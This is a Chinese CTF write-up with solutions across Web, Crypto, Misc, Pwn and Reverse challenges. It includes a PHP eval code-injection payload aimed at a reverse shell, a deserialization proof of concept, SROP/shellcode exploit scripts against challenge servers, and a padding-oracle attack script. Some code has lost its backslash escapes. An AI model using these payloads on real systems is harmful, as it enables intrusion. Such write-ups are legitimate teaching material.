WEB
what's my name
构造payload:
d0g3=12345include'"]);}eval($_POST[1]);/*&name=%00lambda_36
使用bp连续爆破使其反弹shell
拿到shell查看环境变量发现flag
easy_unserialize
构造POC:
<?php
error_reporting(0);
class Luck{
public $l1;
public $md5;
}
class You{
public $y1;
}
$a = new You();
$a -> y1 = new Luck();
$a -> y1 -> md5 = new Luck();
$a -> y1 -> md5 -> l1 = "phpinfo";
echo serialize($a);
?>
//O:3:"You":1:{s:2:"y1";O:4:"Luck":2:{s:2:"l1";N;s:3:"md5";O:4:"Luck":2:
{s:2:"l1";s:7:"phpinfo";s:3:"md5";N;}}}
Crypto
010101
本题关键在
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'
p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'
意思就是p1中有一个1被改为了0
对于p2来说,是有可能不改变的,因为索引值是p_1的
直接爆破即可,遍历p1中的0,把0改为1即可,需要注意的是p2要分两种情况,一种是不变的时候,一种是变的情况
exp:
from Crypto.Util.number import *
import gmpy2
from tqdm import *
n =
603929041261800903893255846837373435975689488156082111538579411971234122241475748036901372456410
420191268918203740933624479627880138860787078343962957545877493495346831028915623609911739520855
865598159115403599691845611787894864022849387193442196306247844978619825889396851220746270712372
629345235420222076680115154790661980407543403831934888441296510749707016149742835334975569330963
811702631399381154725473397239011407333239568323785920549918563058163802790187563167758518996273
164519358725587751057556099683209931508156206102023550113078755175573231054144175740037978473444
981801474458374782704295305402882601070280107624282520071733642472567932754610400320318631599250
987727798785732693028629127928075161764000633755172649305820758541646921112640799416373141028867
694424520169726284794592230472739528017824591893518858631575238481300188255385565135530781399021
638113121796002810581237621059229401475373166398218013467690838657741784353265467188916419980824
688886467277205321029087429010136873982224751707535560753990915173665180626848355707628545030678
081326994468311753531184000767912265077615115921131730201921373353972239662406236256449307913217
499123008959838210605102941439012579314919044679872148810171587616630982300997769
P =
"11010001001011001110010111110000100100111111011100110000001011110010001010111010001000110011110
011100101101111000010000110010011010001100111010001101101010110110000001000111101001111001111100
111010001110001110000011101110111100010100110111111010101101000100101011101111100100100011101001
001010101010100100100010111001101101001001101010111101001101010111111111010101111000110010011001
001010010101110010110111110111001011011000111101110100100001100100111101100010100100000111001111
111111000101001101111111001010000111110000110111110110101101001111010010001111111010011101111111
011101000011101100010000000101000010010001100101001001100000000110111110101001101001010110111011
100101001111111111110010100101101001110000000100011000001011110110101110111010001101000000101111
101011010010000000110100011110101000000110011100001001010000111110101111011001110001000101010010
110100010010000011010000000010110010110110010100000010111100011000101001110100100001110011010101
011010111101000100010001000100100001110001100000011001000000011010110000100011000010010011100101
101000001011110011010111111011001001101000101010011001010100000101011011010001101000110100001010
111000111011111000111000110010111011111001001000111101101111101101100110000010001010100000000010
111001011010110101000110010010100000110010001010001010111110010001110100100001110110100011100110
010101101010010000110010000000000001101001001111000001001110111100101011010000101000001101100000
011010110110001001100001010110010111110000100010010001111000111110111001110111010000010110111101
110010011101010001101000100011111100111101110100100001001010110000110011110011000110010000111111
110011100001110011010010010001011000011101000001100100110101001010110101000100010110000111001100
011101000110010101101110000001110101010010100011111000011011010110001111000001000111011110111000
111111011011101101011011011010101010001001000001001101111101101011010000001111001101010000100100
011011010011011011011110011101001110011000101101010001000111100101010111001110100001001011101000
111110110111111101001100110111011"
c =
866864396798748302465576530152326660245481173793534236784753640970721788266323568403557520601311
817767171677645988574249313462331328699249182766857763506610703905769611309419519579796017697450
162393049455019290625767015147206130074363014073483803296066944305765629091749044378608695211666
360002897194337173058950805242024683682168824731272385732705041911777492743781075933901702319537
220235231097865203950375115575863845155170331670641881859120516355284653083052020593860814968947
676082620328633692596468552608749319013147842671822241860845442786860608114188084274733934010317
792700672346507826764671790839361633617988936721771273549281298387292993978487489742021053204421
653217490858419676618284780878991315733497667632695572396934677257576222407905673028860262629037
886778937829860235541247463386848963347128021042860224260803592199971107171286262028676613890352
957350290827834846397446930936596392243772335716854200550870166123620916846195327305408998210201
738726162207193443742079343842625838607599963084124687082645754339049016964158845480166641195115
457155491066661200506404878951359095554930168798877303294943921674519119144198326738855828172327
56022767909864103483310200762274943174788555599167912909253375001595679099288103
e = 65537
a1 = [i for i, c in enumerate(list(P[:1024])) if c == '0']
a2 = [i for i, c in enumerate(list(P[1024:])) if c == '1']
# p2不变的情况
for i in tqdm(a1):
pp = list(P[:1024])
pp[int(i)] = "1"
p = int(("".join(pp) + "".join(list(P[1024:]))),2)
if isPrime(p):
print(f"p = {p}")
q = n // p
d = gmpy2.invert(e,(p-1)*(q-1))
m = pow(c,d,n)
flag = long_to_bytes(m)
if b"D0g3{" in flag:
print(flag)
break
# D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}
POA
审计代码发现是CBC预言填充攻击,0xGame和NewStar都有出现过。
exp:
from pwn import *
import string
from itertools import product
import hashlib
from tqdm import *
table = string.ascii_letters + string.digits
host = '124.71.177.14'
port = 10010 #端口
GeShi = b'Give Me XXXX:' # 改格式!
p = remote(host,port) #建立连接
data = p.recvuntil(GeShi).decode()
proof = data.split('SHA256')[1]
Xnum = proof.split('+')[0].upper().count("X") #要爆破的数量
tail = proof.split('+')[1].split(')')[0].strip()
hash = proof.split('+')[1].split('n')[0].split(":")[1]
print("未知数:",Xnum)
print(tail)
print(hash)
print("开始爆破")
for i in product(table,repeat=Xnum):
head = ''.join(i)
t = hashlib.sha256((head + tail).encode()).hexdigest()
if t == hash:
print('爆破成功!结果是:', end='')
print(head)
p.send(head.encode())
break
print("以下是提交完XXXX之后的流程n")
p.recvuntil(b"2. decrypt the flagn")
p.sendline(b"1")
temp = p.recvline().decode().split("flag: ")[1].strip()
print(f"temp = {temp}")
token = binascii.unhexlify(temp)
print(f"token = {token}")
def dec(iv, token):
p.sendline(b"2")
p.sendlineafter(b"Please enter ciphertext:", binascii.hexlify(iv+token))
p.recvline()
return b'True' in p.recvline()
counter = len(token) // 16
true_flag = ''
t = token[::]
for ct in range(1, counter):
oldIv = t[16*ct-16:16*ct]
token = t[16*ct:16*ct+16]
flag = [] # 记录原始解密值
suf = []
for i in tqdm(range(1,17)):
for j in range(256):
payload = b"D0g3{U_Get_Fl4g}"[:16-i] + bytes([j]) + bytes(suf) + token
if dec(payload[:16], payload[16:]):
flag.append(j ^ i)
suf.insert(0, j)
for v in range(len(suf)):
suf[v] = suf[v] ^ i ^ (i+1)
print(flag)
break
ans = ""
flag.reverse()
for i in range(16):
ans += chr(oldIv[i] ^ flag[i])
true_flag += ans
print(true_flag)
print(true_flag)
# D0g3{0P@4Ttk}
得到的是QT{0P@d4Ttk},手动改为D0g3{0P@4Ttk}即可
Rabin
题目是Rabin,估计和2有关,大胆猜测了一下e1 = 2
然后简单爆破了一下知道x = 8,e2 = 7
r已知,接下来分解p*q
两式相乘得
移项得
经测试,k1,k2大概是1023bit的数
可以认为
把上式同除pq,即可得到k1k2
然后即可求得k2p + k1q
得到p,q后,前半部分是解Rabin,后半部分求逆元或者有限域开根都可以
exp:
from Crypto.Util.number import *
import gmpy2
e1 = 2
e2 = 5
x = 8
a = b = 0
for i in range(x - (2**2 -1 )):
a += pow(e1,i)
for j in range(3):
b += pow(e2, j)
n =
305742085102073958685058774990374612856503657611159209468741748564654591176180299818778135460948
807176614281796016904753313757927457094861196369069821421681665875176139845644195736238144691839
008758614457979812997005126606399842320648487994406393728514493129219688752202978501994811535834
779889459729683428077498441713132964635907469366512175886337946124631196824508247375645971308484
279007920881639616776491331812849657775358960227848680733861313065565269244274482334952541032707
333167429562469558762781469669359057084779217532331399410333624558772093729396962312936037020992
117478202860898927073068360026814644581294222733341428537874383052653054496502673372786144676806
905626251642090622209277799682962538245425774337944285158783294880516595307576719556933669812074
808919685419881388267486868941401975800053647291641426673593791774634377598637815942343627245274
057532320854646240153245893536480745586533270387549779636700040935751519181245119278044454115223
974366280075995685049945977835434961621019
inv_p =
802756799180901051342948238656732116570600496274138749714282974153551577072528779911452321866599
350679617459731006986329439497903041900965678846070371192578488373549825000489780706198205104086
503866265423380562773351804979555888481384489919638002650733313480976175413061179988577801097711
94563339021595188562
inv_q =
914302700657209423922787494442699898430948389127871882664966118177665281327741873193351156240576
159009762024125078791187129121018627287382049078773960228879534291087298971716774085970807000620
329056750170131403496579795872070838205849060556348577761068021787571317244809347518711173945499
88315719808677297400
c1 =
279829262624833111487846614404340495090412711453739396842631237223093508908861298004169359497577
990040780487322819357702557390766722231132356042456802149817707213578102645028287834365660499160
128269917223079714359886535913704456526279328639342803225864505419437263616697052230052567070333
933236811997422268656390617964937442213866506719214085992816750721951096049449952469901172597529
219590785707160193489116118218077435422026060178616800938994539625357510570298032123137084862524
999615319167693390262434562544157954745667250453975809879452762929404256155634268727066126546737
609571329547065613153159265838477567285813345897636226904266459253790335529658870917742613284841
016773857605103085659394509692804315141931539014651478749942888888639616265334375465230907046772
582713610088994240589688414036578088399411366065578219022217569030887346591782989421850138142065
831512735735335407568984575726852801308267058248998475741233925750251825453318717074788815820608
32153045557952057641871852784168481101647
c2 =
161619014853290061321220693856242384241899565606310997462914314289208211523608827698222734190386
889612098570760765052452215805711014546122099647560430788381292730765852839847593053599250289125
651012417026034998933486356540308165710913202176920168248765753912975464775516099366852853130484
143941438754410599163284892652060800647319146257668079858962426955881454668916171211181142453679
621166656675384626603665740562005722087726838877971126595828345860415781411146330129891129797182
526922825440860137352029911523070206447988669663751215339049795213569586767141039747546364893768
334626213397240105328357731197925663794385770706516043309955122745946633182399168534133436912290
389494270925639788309351783493083085094045092781888997140679841389857851588928742292158429434570
541383701331355804702559218884246423448924119442796513423570240629502315241227996438176424546368
309332048747610392861954126660466095971227213870875955019656804172566974654412258429352773642042
554134725696296293760333163865827998422748
def getr():
r = 2
while True:
r = r * x
if r.bit_length() > 1024 and isPrime(r - 1):
r = r - 1
break
return r
r = getr()
pq = n // r
temp = inv_p*inv_q * pq
k1k2 = (temp- pq) // pq
print(k1k2) #检验过这个式子没问题
k1q_k2p = temp - k1k2 * pq - 1
delta = k1q_k2p**2 - 4 * k1k2*pq
k1q = (k1q_k2p + gmpy2.iroot(delta,2)[0]) // 2
k2p = (k1q_k2p - gmpy2.iroot(delta,2)[0]) // 2
q = gmpy2.gcd(k1q,pq)
p = gmpy2.gcd(k2p,pq)
print(f"q = {q}")
print(f"p = {p}")
def decrypt1(c,p,q,inv_p,inv_q,n):
mp = pow(c, (p + 1) // 4, p)
mq = pow(c, (q + 1) // 4, q)
inv_p = gmpy2.invert(p, q)
inv_q = gmpy2.invert(q, p)
a = (inv_p * p * mq + inv_q * q * mp) % n
b = n - int(a)
c = (inv_p * p * mq - inv_q * q * mp) % n
d = n - int(c)
aa = [a, b, c, d]
for i in aa:
flag = long_to_bytes(int(i))
if b"D0g3" in flag:
print(flag)
break
decrypt1(c1,p,q,inv_p,inv_q,pq) # D0g3{82309bce-9db6-53
phi = (p-1)*(q-1)*(r-1)
d = gmpy2.invert(e2,phi)
m = pow(c2,d,n)
print(long_to_bytes(m)) # 40-a9e4-a67a9ba15345}
# D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
MISC
签到处
misc-dacongのWindows
一个win10镜像,我这里还下载了最新版的vol3做的
首先windows.filescan一下看一下desktop,发现有很多wav,听了一下一眼SSTV,最后发现dacong39.wav是我们的flag1
flag2是找到一个secret.rar,里面有一个有snow隐写的,空密码解密即可
flag3在桌面有一个flag3.txt,得到一些AES密文
之后找key,根据题意,找注册表windows.registry.printkey
正好16位,一眼key,aes解密即可
Nahida
下载附件,利用工具reverse得到一个jpg,图片末尾有一些奇怪的东西,复制出来发现是utf-8编码
神之眼考虑silenteye,不知道key,尝试题目名Nahida,得到flag。
misc-dacongのsecret
第一个图片,正常隐写尝试过没有东西,单图盲水印
得到第一个压缩包的密码,之后在jpg图片的末尾发现一些16进制,逆向得到一个压缩包
通过hint3,pngcheck
最后一段IDAT有问题,之后结合爆破宽高,应该是提取出这一段IDAT段,之后覆盖到一个新的png图片 上,之后爆破宽高得到key。
之后解密,base64隐写,得到新pass。
m1ku_1s_sha_fufu123
考虑jpg隐写,jphide,得到flag。
PWN
side-channel, initiate!
只有or无w,那么我们容易想到利用mprotect赋权然后执行shellcode,但是程序中禁用了write,所以栈迁移之后只有一次返回的机会,所以要先用bss段的输入提前构造好shellcode和srop链,然后是无write的shellcode,这里要在shellcode中写入loop循环然后用cmp来和读入到程序中的flag进行匹配,匹配成功时就会卡住,然后以此为循环爆破出flag。
exp:
from pwn import*
context(os='linux', arch='amd64')
elf = ELF('./chall')
syscall2=0x40118A
syscall=0x401060
rax_15 = 0x401193
main = 0x401421
flag = ""
def exp(dis,char):
shellcode = asm('''
mov r12,0x67616c66
push r12
mov rdi,rsp
xor esi,esi
xor edx,edx
mov al,2
syscall
mov rdi,rax
mov rsi,0x404500
mov dl,0x40
xor rax,rax
syscall
mov dl, byte ptr [rsi+{}]
mov cl, {}
cmp cl,dl
jz loop
mov al,60
syscall
loop:
jmp loop
'''.format(dis,char))
frame = SigreturnFrame()
frame.rdi = 10
frame.rsi = 0x404000
frame.rdx = 0x1000
frame.rcx = 7
frame.rip = syscall
frame.rsp = 0x4041ba
p1 = b'x00'*0x52+p64(rax_15)+p64(syscall2)+bytes(frame)+p64(0x404260)
p1 = p1.ljust(0x200,b'x00')
p1+=shellcode
io.sendafter('easyhackn',p1)
io.sendafter('SUID?n',b'x00'*(0x2a)+p64(0x404050+0x30)+p64(0x401421))
io.send(b'x00'*(0x2a)+p64(0x404050+0x30+0x2a)+p64(0x401421))
io.send(p64(0x404050+0x30+0x2a+0x10))
for i in range(len(flag),50):
sleep(1)
log.success("33[1;31;40m flag : {}33[0m".format(flag))
for j in range(0x20,0x80):
io = remote('47.108.206.43',31866)
try:
exp(i,j)
io.recvline(timeout=1)
flag += chr(j)
io.send('n')
log.success("{} pos : {} success".format(i,chr(j)))
io.close()
break
except:
io.close()
io.interactive()
seccomp
pwn1 的简单版srop打orw
exp:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:X1NRI
import sys
import os
from pwn import*
from ctypes import *
def dbg(command):
gdb.attach(io,gdbscript=command)
#------------------------------------------------------------------
def pwn():
syscall_p_ret=0x000000000040118a
sigreturn_ret=0x0000000000401194
leave_ret=0x000000000040136c
bss=0x0000000000404060
#------------open
sigframe_open = SigreturnFrame()
sigframe_open.rax = 2
sigframe_open.rdi = bss+0x110 #flag_addr
sigframe_open.rsi = 0
sigframe_open.rdx = 0
sigframe_open.rsp = bss+0x200-8
sigframe_open.rip = syscall_p_ret
payload=p64(sigreturn_ret)+p64(syscall_p_ret)+bytes(sigframe_open)
payload+=flat([0,b'./flagx00x00'])
payload=payload.ljust(0x200,b'x00')
#--------------read
sigframe_read = SigreturnFrame()
sigframe_read.rax = 0
sigframe_read.rdi = 3
sigframe_read.rsi = bss+0x800
sigframe_read.rdx = 0x100
sigframe_read.rsp = bss+0x400-8
sigframe_read.rip = syscall_p_ret
payload+=p64(sigreturn_ret)+p64(syscall_p_ret)+bytes(sigframe_read)
payload=payload.ljust(0x400,b'x00')
#-------------write
sigframe_write = SigreturnFrame()
sigframe_write.rax = 1
sigframe_write.rdi = 1
sigframe_write.rsi = bss+0x800
sigframe_write.rdx = 0x100
sigframe_write.rsp = bss+0x600-8
sigframe_write.rip = syscall_p_ret
payload+=p64(sigreturn_ret)+p64(syscall_p_ret)+bytes(sigframe_write)
#--------------------------
sa('easyhackn',payload)
payload=b'a'*(0x2a)+p64(bss-8)+p64(leave_ret)
sa('SUID?n',payload)
itr()
if __name__ == '__main__':
context(os='linux',arch='amd64')
context.terminal=["tmux","splitw","-h"]
binary='./chall'
context.log_level='debug'
elf=ELF(binary)
libc=elf.libc
if(len(sys.argv) == 3):
io = remote(sys.argv[1],sys.argv[2])
else:
io = process(binary)
s = lambda payload :io.send(payload)
sl = lambda payload :io.sendline(payload)
sa = lambda data,payload :io.sendafter(data,payload)
sla = lambda data,payload :io.sendlineafter(data,payload)
r = lambda num :io.recv(numb=num)
ru = lambda data,DROP :io.recvuntil(data,drop=DROP)
rl = lambda :io.recvline(keepends=True)
uu32 = lambda :u32(io.recvuntil(b'xf7')[-4:].ljust(4,b"x00") )
uu64 = lambda :u64(io.recvuntil(b'x7f')[-6:].ljust(8,b"x00") )
ep = lambda data :elf.plt[data]
eg = lambda data :elf.got[data]
es = lambda data :elf.sym[data]
ls = lambda data :libc.sym[data]
itr = lambda :io.interactive()
ic = lambda :io.close()
pt = lambda s :log.info('33[1;31;40m %s --- %s 33[0m' % (s,type(eval(s))))
lg = lambda name,addr :log.success('33[1;31;40m{} ==> {:#x}33[0m'.format(name,
addr))
pwn()
REVERSR
mobliego
将输入经过checkflag加密有与R.string.cmp比较
在资源文件中找到R.string.cmp
容易看出密文就是flag打乱了顺序,那么可以用一个不重复的明文输入给程序,用objection hook掉返回值,根据得到的密文还原flag的顺序
exp:
test="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl"
get="ViLdOlJTePKcMYZFQBSHUCXWIaAGkfbDghjNER"
enc="49021}5f919038b440139g74b7Dc88330e5d{6"
for i in test:
print(enc[get.index(i)],end="")
#D0g3{4c3b5903d11461f94478b7302980e958}
感觉有点点简单
魔改RC4和魔改base64
RC4直接粘就行了,Base64根据位运算关系还原明文.
exp:
enc="6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw"
table="4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh"
index=[table.index(i) for i in enc]+[0]
data=[]
for i in range(0,len(index),4):
get=index[i:i+4]
data.append(get[0]|((get[1]&0b11)<<6))
data.append((get[1]>>2)|((get[2]&0b1111)<<4))
data.append((get[2]>>4)|(get[3]<<2))
key="the_key_"
byte_140003010=[]
for i in range(64):
byte_140003010.append(i)
v7=[]
for j in range(64):
v7.append(ord(key[j%len(key)]))
v6=0
for k in range(64):
v6=(v7[k] + byte_140003010[k] + v6) % 64
byte_140003010[k], byte_140003010[v6]=byte_140003010[v6],byte_140003010[k]
v5=0
v6=0
for i in range(len(data)):
v5 = (v5 + 1) % 64
v6 = (byte_140003010[v5] + v6) % 64
byte_140003010[v5], byte_140003010[v6] = byte_140003010[v6], byte_140003010[v5]
data[i]^=(v6 ^ v5) & byte_140003010[(((v6 ^ v5) + byte_140003010[v6] + byte_140003010[v5]) %
64)]
print("".join(map(chr,data)))
#D0g3{608292C4-15400BA4-B3299A5C-704C292D}
牢大想你了
dnspy打开看到一堆tea
在GameManager中找到很多类似验证flag的地方
发现两个字段,猜测是key和密文
根据key一般只有4位,和对tea的了解,以及代码的正确性,在众多tea中找到了一个最像的
然后解tea就得到了flag
exp:
from ctypes import *
import libnum
enc=[i for i in
bytes.fromhex("4F9173C80086624A1C7AC720AA7A871A82A9FAD664C9D160324C88B962A8082A36004AC796E12E8FA
9A608EF960885A3")]
enc1=[int.from_bytes(enc[i:i+4],"little") for i in range(0,len(enc),4)]
a1=enc1
a2=[0x11111111]*4
decode={}
v5=c_uint32(0)
times=32
delta=2654435769
for j in range(0,len(a1),2):
v5=c_uint32(delta*times)
v1=c_uint32(a1[j])
v2=c_uint32(a1[j+1])
for i in range(times):
v2.value -= (v1.value<<4)+a2[0]^v1.value+v5.value^(v1.value>>5)+a2[1]
v1.value -= (v2.value<<4)+a2[2]^v2.value+v5.value^(v2.value>>5)+a2[3]
v5.value -= delta
decode[j]=v1
decode[j+1]=v2
for i in decode:
print(libnum.n2s(decode[i]))
#D0g3{it_is_been_a_long_day_without_you_my_friend}
你好,PE
去掉__CheckForDebuggerJustMyCode反调试,动调一直跟到主程序.
from ida_hexrays import *
from ida_dbg import *
from idaapi import *
from idautils import *
from idc import *
from ida_kernwin import *
for item in CodeRefsTo(0x0450C10, 1):
patch_bytes(item,bytes([90]*5))
加密逻辑如下:
看汇编,八个字节一轮加密
后4个字节的dword和0比较:
如果大于0(最高位为0)
其中unk_10059f9f中只有两句关键
其中shld为双精度左移指令,即eax(前4个字节)不变,edx(后4个字节)左移后缺的低位由eax高位来补,这里cl始终为1。如果小于0,前四个字节会多异或一个0x54AA4A9。
除了edx的高位,其他都可以通过位运算和异或还原,所以主要解决edx高位的问题,当edx高位为1即小于0时,前四个字节左移1位(低位为0)后异或0x54AA4A9(低位为1),结果低位为1,如果edx高位为1,前四位低位就是0,由此思路写脚本。
exp:
import libnum
enc=[77, 184, 118, 41, 245, 169, 158, 89, 85, 86,
177, 196, 47, 33, 44, 48, 179, 121, 120, 23,
168, 237, 247, 219, 225, 83, 240, 219, 233, 3,
81, 94, 9, 193, 0, 223, 240, 150, 252, 193,
181, 230, 98, 149, 1, 0, 0, 0]
data=[int.from_bytes(enc[i:i+4],"little") for i in range(0,len(enc),4)]
for i in range(0,len(data),2):
a=data[i]
b=data[i+1]
for j in range(64):
if a&1==1:
a ^= 0x54AA4A9
a=((b&1) <<31)| a>>1
b = 1 << 31 | b >> 1
else:
a = ((b&1) << 31) | a >> 1
b = b>>1
data[i]=a
data[i+1]=b
for i in data:
print(libnum.n2s(i).decode()[::-1],end="")
#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}
你见过蓝色的小鲸鱼
去掉__CheckForDebuggerJustMyCode反调试,动调到加密程序.
像是魔改的sm4,照着解密即可,this数组输入正确的密钥动调即可得到
exp:
uint32_t ans1[1024] = { 3612299254, 909017393, 3176992461, 3316901652, 2609835858, 2796138362,
3652223468, 4026124070, 4005344247, 3018204662, 3971881576, 1883703289, 3380028605, 2310268358,
3192089339, 3865334851, 991473981, 4261573226, 3513563506, 3274279743, 4056254897, 393233045,
3857783913, 3209970495, 3545254565, 1726489627, 2617077090, 536406376, 2185599772, 810099132,
3109160618, 2098277993, 592628296, 3835560518, 1236356276, 2806853253, 3386832562, 2875662589,
1716755816, 1338756477, 135048504, 3661026591, 985113045, 3225175390, 3059325024, 947849520,
1317660494, 437204192, 2901243097, 3844245920, 120516819, 3690592916, 1742621374, 961341586,
82579909, 2602161357, 688080856, 1834854888, 1205398077, 1803263324, 3278861203, 1118662528,
2233320600, 1503686121, 3021908902, 169435313, 4132028466, 3591033800, 604594897, 1387163463,
3610184282, 82732284, 3734169552, 26558337, 3263666052, 1675780680, 1245030056, 4023753971,
3106900708, 1161959714, 1921670186, 2139379863, 3111216585, 144875354, 3891556883, 2915976098,
1543965061, 3180167923, 2907634212, 706636810, 2809431891, 3339771535, 3003842848, 666170416,
2214373859, 3719315293, 1191578267, 2426783095, 3079199401, 1830926746, 3204220640, 3731036918,
1660271787, 492612286, 2570398579, 3227925737, 3774103751, 1359649358, 3445737257, 2401180843,
1760303728, 3485791200, 472932926, 3753885968, 4161071017, 2648262891, 262921962, 2374085492,
2248303185, 390396083, 2712543590, 2161070294, 174295997, 3158425513, 940358329, 1878094520,
3005772882, 3959545626, 2147432275, 938305420, 1663595663, 235114013, 165426881, 1434286583,
397714971, 3286531863, 3890683405, 2503783237, 3156100839, 1862835550, 2877364194, 2360580686,
2946284660, 1773107797, 1704357043, 970020583, 3671336424, 2997981521, 2379920259, 4265442517,
925584979, 2425516426, 2121507294, 3583831078, 950172452, 3859984899, 2852403993, 2834441141,
3757363531, 239582191, 1408912961, 3290831151, 810650838, 151049394, 3826060979, 7664562,
1203440678, 756917008, 1270613790, 1462665932, 3976216079, 2201884704, 1198888899, 1862145384,
1842954329, 3254547884, 3352184565, 1559929120, 2732851026, 3472229415, 3324261065, 1912193298,
1520363419, 1013564590, 2466244710, 3515836733, 3290010742, 1475359871, 2469026558, 265453838,
3764144433, 1951032479, 1789095261, 882704806, 2080169719, 1355828509, 216692911, 2077881151,
2179175345, 658329417, 2639415873, 1608429810, 2328829540, 3922963539, 3590750574, 3005810895,
3054927960, 3145751839, 2438530629, 3178227540, 2656268540, 2918949977, 2025459779, 702388526,
352396826, 2845512848, 3136351238, 582022810, 942471529, 2425653069, 4060440851, 1489288468,
2812878567, 1690137298, 3825703696, 2033813973, 2840178772, 3205759263, 3158390194, 4194323040,
2773043817, 633123956, 78997677, 3806715992, 157202888, 2479881715, 3347034983, 4027390473,
676130488, 559181126, 1893767750, 3132813806, 1737160727, 3039073421, 1904851998, 2726372549,
1482038449, 1772371038, 1399137205, 502080223, 1158624194, 1959469547, 2125030951, 1146241092,
136874116, 3312727756, 3123845189, 1616952983, 1116822306, 1447890576, 798589893, 2759565721,
2635262896, 267525495, 969441731, 3528824463, 2723329496, 3988026719, 3069802268, 3904044072,
1247175377, 3018910654, 1144761192, 1693003556, 653667911, 1322824793, 2685461955, 3423544340,
3895206564, 1263613072, 484014289, 4002680300, 82525547, 3713365205, 2785407392, 3203680529,
568074554, 2948600661, 690536872, 3761766135, 4093211731, 3026577007, 3623968899, 3114714815,
1660107032, 1630017735, 4015244569, 795121368, 181611949, 2302983550, 299228304, 1035595335,
4107946561, 4248631138, 759316079, 3455675297, 1802306174, 1248446376, 2220813029, 1106431524,
2974149249, 913000283, 1101868625, 1963166077, 1204015669, 2936566510, 1849439059, 1188145533,
1970281242, 3473902661, 3605729351, 779644256, 317399433, 2294142642, 3187988184, 3234556957,
2451570191, 539845509, 4051034255, 4207789360, 918997589, 4024179045, 47092157, 3461478898,
219928750, 3174028876, 3798490823, 4236068923, 1733771380, 2213684509, 3418631303, 1791707244,
2954339021, 604474946, 715741480, 1538117713, 2018946469, 3133692790, 2057135452, 4081014361,
1737711834, 443814679, 3951854071, 1261695230, 3484936769, 811019382, 3431304140, 2125583415,
3242734973, 4068818582, 1140887881, 2754994089, 1849203727, 2776434143, 4101627524, 1104008366,
3343386008, 1690010785, 1589833538, 2830854046, 3005511388, 1327586722, 3365805672, 2894519128,
377014138, 3258751486, 682576491, 1144946337, 2527160065, 1145337453, 1543577757, 1661179461,
716027965, 2345828765, 3765457141, 3719354469, 3575166803, 674417138, 2258687374, 4034399391,
3447359359, 4155138269, 2155299098, 1682039011, 3063342633, 97543685, 3653422538, 2954039847,
2269743455, 2661523390, 436334478, 1525296779, 1449357693, 4202155545, 1935437360, 3296147951,
2570170770, 1361243263, 2810328459, 3126080089, 3862996957, 1501245806, 146428735, 1286347126,
1666807071, 2983557661, 3352824585, 2918359338, 1936219053, 3034276746, 4001013798, 2185013997,
1018960196, 505963722, 560767059, 602988785, 800926720, 4165486503, 85828300, 3227976635,
649010145, 1125597870, 966697127, 167433808, 874570896, 3458750878, 3395258985, 252088262,
4222815752, 2639595847, 823198564, 486454327, 833313397, 205508261, 2786404808, 2510035198,
733713357, 1354849271, 3215264880, 1669427806, 1452787206, 3301133258, 3020307851, 2543834212,
1483052027, 2983195960, 3960532648, 3326718810, 1483969807, 1747416431, 1426364238, 1473516291,
3546046313, 376764897, 1169008197, 4294111582, 1594224422, 2284959488, 896177674, 204425518,
2774265376, 3033824452, 2439216892, 4053408298, 1693000377, 2609129969, 3032619608, 308898488,
3702536945, 977921220, 2735144083, 670850509, 2980849390, 1060995153, 1355919448, 1635397140,
4088809980, 1420233277, 663910423, 2710634922, 383964395, 4181644457, 2052912767, 3955690015,
645774729, 3320447412, 525766475, 3072324203, 2984772920, 608845350, 1847968149, 1506522579,
1499948296, 1132257855, 3799040339, 2104379384, 1857522470, 4264354361, 13542311, 4105907176,
916156479, 3593386610, 2662026461, 1622743063, 105136493, 2412473138, 4064549266, 3123460414,
3921011079, 718464174, 278010642, 2894547666, 1832841070, 3833519489, 2789630359, 3932469301,
314230278, 843881168, 1591227520, 2173809348, 1802556348, 3426041307, 3571278871, 130404080,
582313559, 1068143687, 3081884854, 85711274, 3891579692, 2539344878, 1011763299, 266906039,
355962384, 3286276118, 862412479, 2027782370, 3255596042, 607628161, 1009421605, 2722485621,
4288910093, 475523691, 1238990637, 3029919481, 1227651643, 457015533, 453798348, 4137614187,
286748010, 2948221670, 147673401, 2618102637, 1554248227, 67648155, 1534379566, 4269591083,
2170536445, 2387217625, 3192685544, 3879696649, 3276561223, 450492746, 4040053455, 893402262,
110762684, 454018881, 3993940863, 2619682979, 2392445782, 1975308775, 2633142153, 1099704695,
3660468837, 1356389045, 4235162877, 3156792154, 2167871338, 1325276422, 477945007, 1015766725,
312791145, 1919976644, 2536378684, 3553880401, 1245281630, 1723424489, 4242078577, 127882815,
2076642282, 2897062914, 3422554873, 2511825743, 3279714577, 676398387, 2477683067, 2690393167,
1557866509, 2377366658, 1833176462, 1867241793, 1728770188, 2030196186, 487071513, 2557723795,
126875659, 3310563015, 832818887, 1279107586, 1189176266, 402509529, 3673978930, 3562678424,
1101937332, 1433686036, 2828533185, 2344180009, 2360208424, 2067254040, 2605496877, 2633778875,
1374180181, 958478401, 3769939655, 3095119178, 3404498833, 3498729428, 2919725926, 3899615018,
1622936878, 1714950277, 1416079787, 1028838279, 2370886484, 1179276667, 3630483254, 2211301498,
3110750966, 3842377908, 2062040230, 616149483, 51223745, 661298142, 1348065750, 3529860603,
2758213304, 193574778, 1229799653, 3471014957, 865196813, 2981594497, 3144691620, 45598418,
1428776199, 2981650001, 886009176, 1673674753, 2482633515, 835001229, 356110831, 1862373254,
4053415012, 924842823, 1325083506, 2566709663, 476044749, 862582026, 403946608, 981948886,
95040438, 2896276803, 1660022945, 4205568328, 3074709622, 3526601780, 1968748706, 3098387267,
1212705143, 1764694666, 192896265, 2191766229, 1432204716, 1288310487, 380336587, 2713303837,
1410063421, 79079056, 1138884246, 1300812639, 2241915529, 983867098, 1692596682, 3376239816,
3909096113, 671223618, 1578759049, 2882967937, 1013691809, 2770998440, 15399867, 796952286,
2381001978, 118957219, 349371860, 3509336758, 3550298454, 3983933129, 2431510086, 2754122191,
609900711, 3886727998, 880847986, 213232128, 910454213, 2459776557, 1942498188, 1669211226,
